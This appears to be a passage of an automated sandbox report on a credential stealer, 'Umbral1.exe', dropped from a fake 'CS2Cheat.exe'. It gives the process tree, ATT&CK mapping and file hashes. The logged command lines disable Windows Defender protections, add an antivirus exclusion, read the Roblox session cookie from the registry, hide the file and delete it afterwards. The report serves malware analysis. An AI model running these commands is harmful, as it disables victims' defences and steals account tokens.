        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral1.exe'
        42⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        42⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        42⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        42⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4964
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        42⤵
        
        PID:5004
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        42⤵
        
        PID:4168
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        42⤵
        
        PID:2360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        42⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4700
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        42⤵
        Detects videocard installed
        
        PID:2992
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe" && pause
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4700
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        43⤵
        
        PID:2360
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        43⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1936
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        40⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        39⤵
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        38⤵
        
        PID:684
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        37⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        36⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        35⤵
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        34⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        33⤵
        Executes dropped EXE
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        32⤵
        Executes dropped EXE
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        31⤵
        Executes dropped EXE
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        30⤵
        Executes dropped EXE
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        29⤵
        Executes dropped EXE
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        28⤵
        Executes dropped EXE
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        27⤵
        Executes dropped EXE
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        26⤵
        Executes dropped EXE
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        25⤵
        Executes dropped EXE
        
        PID:1460
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        24⤵
        Executes dropped EXE
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        23⤵
        Executes dropped EXE
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        22⤵
        Executes dropped EXE
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        21⤵
        Executes dropped EXE
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        20⤵
        Executes dropped EXE
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        19⤵
        Executes dropped EXE
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        18⤵
        Executes dropped EXE
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        17⤵
        Executes dropped EXE
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        16⤵
        Executes dropped EXE
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        15⤵
        Executes dropped EXE
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        14⤵
        Executes dropped EXE
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        13⤵
        Executes dropped EXE
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        12⤵
        Executes dropped EXE
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        11⤵
        Executes dropped EXE
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        10⤵
        Executes dropped EXE
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        9⤵
        Executes dropped EXE
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        8⤵
        Executes dropped EXE
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        7⤵
        Executes dropped EXE
        
        PID:2984
      - C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        6⤵
        Executes dropped EXE
        
        PID:2236
    - - C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        5⤵
        Executes dropped EXE
        
        PID:4260
  - - C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
      4⤵
      Executes dropped EXE
      PID:4136
- - C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
    3⤵
    - Executes dropped EXE
    PID:2716
- C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
    3⤵
    - Views/modifies file attributes
    PID:776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral1.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3896
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1620
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3756
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3972
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2760
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3924
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3940

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4136

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:2232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral1.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
44cc2ace0ab8f6d2b9451e69ca703395

SHA1
197e9c479a75b47a0be7f62d531c530bda7eeced

SHA256
511469e6c6fef21d43955983c65007dc53f4c90b76fd1729b7da04b9d25756ba

SHA512
60f5e6659e02e6fab9a1ab1bce47a19cf19eec1edf8a874d4712bc655e5a2c2e16bfff35ef701d75f1f137cf7063ba1c5685db6dc73355ee0fec16f7aba65f9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
966914e2e771de7a4a57a95b6ecfa8a9

SHA1
7a32282fd51dd032967ed4d9a40cc57e265aeff2

SHA256
98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

SHA512
dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c9b6705519e1eef08f86c4ba5f4286f3

SHA1
6c6b179e452ecee2673a1d4fe128f1c06f70577f

SHA256
0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

SHA512
6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c6aae9fb57ebd2ae201e8d174d820246

SHA1
58140d968de47bcf9c78938988a99369bbdb1f51

SHA256
bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08

SHA512
5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
985b3105d8889886d6fd953575c54e08

SHA1
0f9a041240a344d82bac0a180520e7982c15f3cd

SHA256
5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

SHA512
0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\2YgSCiaLNzun1sc

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9CFRcroWSr5h57

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe

Filesize
5.7MB

MD5
920f3ec2a3fe3557e067f5cef16235f8

SHA1
30a82dc93b0d235d618f44a94bcd092791821912

SHA256
bd0976acd920ba7eedaad30f8834062856da10b46bf6c8ad9312fb3fdacddb8e

SHA512
0fc2e8ee35c4e56efc1bfded2803474881b3b29d4b01c80a600aff36a002a63108fa6e200100e0e1866ce58fd3040188949f00968802430d4e9f9e5c1eced681

Download Submit
C:\Users\Admin\AppData\Local\Temp\H75D8tqg7AaJuzd\Browsers\Cookies\Chrome Cookies.txt

Filesize
260B

MD5
14169acca9b48d8322acd74c4e781836

SHA1
33c5190d7dbef0c9dc48156bd5035423ef2fee03

SHA256
d8bd77885fef288643c101d23bfa9f63ac907b67186100c68ce3304d196e6484

SHA512
3b0a24801231f3e79c655e2100f53e3472ffac2d24742d1accd8d1909580c0fbd2511ccc39a014bbcad8f5728402c322298df82d4bef1b2b65abf82d81dbded3

Download Submit
C:\Users\Admin\AppData\Local\Temp\H75D8tqg7AaJuzd\Display\Display.png

Filesize
423KB

MD5
5b477124a3b197fc8e884ffe991aacfa

SHA1
6519319df44023a348f42516eab69ab9363afbe8

SHA256
c60d5c8616e304fe1842f49161c07bcbf687d5233262210691bcb2d535fe9054

SHA512
88701425345323bdd81ca9b1274a64b26c0aba5ef1ae438cec7c95b87e0559d29dde522a6f623cc34343d2178561279020a99197019f61e557d12564b0917472

Download Submit
C:\Users\Admin\AppData\Local\Temp\OFssQhkMLthI1Co

Filesize
20KB

MD5
722fc69c95c253415d3b662f9987d447

SHA1
6587425aba551fa963cca688f6938fee2f01e37c

SHA256
276cbe63461141ff827acb4e0af1392d511cb7fe6127c45f44d9a46e8aebaec5

SHA512
3fa4be80620048d16e5a720a51c39abe87ca8c668780782a2d25835be845f2d3dc47d3d2dc7ec14b70c7462e722cee23c312b77baa53cb164db76831cad0d15c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral1.exe

Filesize
231KB

MD5
4fac42572030e392a8c26e17c895920e

SHA1
d9dc3392f371fa9c6c50bf54f346212d5e31e160

SHA256
6e0a0b8ab7d19a27340bf4037a6ec8f455a2d7a993711aee199899c14befd200

SHA512
692c5a39f275780ce0cf651f6277d126966b2a8d79047244a4deed6ba457ba3fd1c5243bfa8295b84fdb2350b3f562c1bfaf375b70c14a6c1a401d999308c60c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i4bheg1z.vyr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pS1qDdhmXY4bhkv

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/808-234-0x000001F3D3560000-0x000001F3D3709000-memory.dmp

Filesize
1.7MB

Download
memory/1104-476-0x000001F2C72C0000-0x000001F2C7469000-memory.dmp

Filesize
1.7MB

Download
memory/1348-1793-0x0000015642F40000-0x00000156430E9000-memory.dmp

Filesize
1.7MB

Download
memory/1816-1645-0x00000228C8BE0000-0x00000228C8D89000-memory.dmp

Filesize
1.7MB

Download
memory/1908-2029-0x000002372CB90000-0x000002372CDAC000-memory.dmp

Filesize
2.1MB

Download
memory/2104-1969-0x0000026CF0780000-0x0000026CF08EA000-memory.dmp

Filesize
1.4MB

Download
memory/2104-1929-0x000002B0718A0000-0x000002B071ABC000-memory.dmp

Filesize
2.1MB

Download
memory/2368-1180-0x0000025F20AF0000-0x0000025F20C99000-memory.dmp

Filesize
1.7MB

Download
memory/2392-33-0x00000192EBEB0000-0x00000192EBED2000-memory.dmp

Filesize
136KB

Download
memory/2420-67-0x0000021C32040000-0x0000021C32090000-memory.dmp

Filesize
320KB

Download
memory/2420-160-0x00007FFE170B0000-0x00007FFE17B71000-memory.dmp

Filesize
10.8MB

Download
memory/2420-159-0x0000021C4ABC0000-0x0000021C4AD69000-memory.dmp

Filesize
1.7MB

Download
memory/2420-118-0x0000021C320A0000-0x0000021C320AA000-memory.dmp

Filesize
40KB

Download
memory/2420-119-0x0000021C4A8E0000-0x0000021C4A8F2000-memory.dmp

Filesize
72KB

Download
memory/2420-69-0x0000021C30750000-0x0000021C3076E000-memory.dmp

Filesize
120KB

Download
memory/2420-66-0x0000021C4AA60000-0x0000021C4AAD6000-memory.dmp

Filesize
472KB

Download
memory/2420-16-0x00007FFE170B0000-0x00007FFE17B71000-memory.dmp

Filesize
10.8MB

Download
memory/2420-14-0x00007FFE170B3000-0x00007FFE170B5000-memory.dmp

Filesize
8KB

Download
memory/2420-13-0x0000021C30280000-0x0000021C302C0000-memory.dmp

Filesize
256KB

Download
memory/2436-695-0x000001FE7ACC0000-0x000001FE7AE69000-memory.dmp

Filesize
1.7MB

Download
memory/2680-1719-0x000002235B300000-0x000002235B4A9000-memory.dmp

Filesize
1.7MB

Download
memory/2736-864-0x0000022E325F0000-0x0000022E32799000-memory.dmp

Filesize
1.7MB

Download
memory/2932-1106-0x000002257EEF0000-0x000002257F099000-memory.dmp

Filesize
1.7MB

Download
memory/3112-550-0x0000018356100000-0x00000183562A9000-memory.dmp

Filesize
1.7MB

Download
memory/3152-1571-0x000001CD62800000-0x000001CD629A9000-memory.dmp

Filesize
1.7MB

Download
memory/3608-1496-0x00000299AC1F0000-0x00000299AC399000-memory.dmp

Filesize
1.7MB

Download
memory/3852-779-0x0000023724FE0000-0x0000023725189000-memory.dmp

Filesize
1.7MB

Download
memory/3868-1264-0x000001C424BC0000-0x000001C424D69000-memory.dmp

Filesize
1.7MB

Download
memory/4048-392-0x000001D1ACD20000-0x000001D1ACEC9000-memory.dmp

Filesize
1.7MB

Download
memory/4540-308-0x0000029CD20B0000-0x0000029CD2259000-memory.dmp

Filesize
1.7MB

Download
memory/4620-938-0x0000021CA6500000-0x0000021CA66A9000-memory.dmp

Filesize
1.7MB

Download
memory/4692-1348-0x000002253F160000-0x000002253F309000-memory.dmp

Filesize
1.7MB

Download
memory/4916-96-0x0000028B4C930000-0x0000028B4C978000-memory.dmp

Filesize
288KB

Download
memory/4964-1887-0x000001D064360000-0x000001D0644CA000-memory.dmp

Filesize
1.4MB

Download
memory/5048-1022-0x000002C34BCE0000-0x000002C34BE89000-memory.dmp

Filesize
1.7MB

Download
memory/5076-1422-0x0000026B7B8D0000-0x0000026B7BA79000-memory.dmp

Filesize
1.7MB

Download
memory/5096-624-0x000001C7D9610000-0x000001C7D97B9000-memory.dmp

Filesize
1.7MB

Download